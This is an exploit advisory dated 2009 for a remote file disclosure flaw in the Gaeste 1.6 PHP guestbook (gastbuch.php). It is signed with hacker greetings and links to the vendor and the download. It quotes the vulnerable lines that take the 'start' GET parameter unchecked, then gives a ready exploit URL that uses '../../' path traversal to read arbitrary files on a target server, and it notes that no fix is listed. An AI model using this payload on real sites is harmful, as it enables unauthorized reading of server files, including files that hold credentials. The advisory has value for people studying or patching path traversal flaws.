Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability

2009-02-09 07:03:14


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ +
+ +
+ bd0rk || SOH-Crew +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



=> Vendor: http://www.php4scripte.de/

=> Download: http://www.php4scripte.de/download/gastbuchxhtml16.zip

=> Bugfound3R: bd0rk

=> Greetz: str0ke, TheJT, TheAJ, kretzi, DarkFig, Perforin ;-)

=> Vulnerable Code in gastbuch.php line 2-3

-------------------------------

if (isset($_GET['start'])) {
$start=$_GET['start'];

-------------------------------


[+]XPL0iT: http://[t4rg3t]/[gaestepath]/gastbuch.php?start=../../TARGETFILE.php


###The 20 years old, german Hacker bd0rk###

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.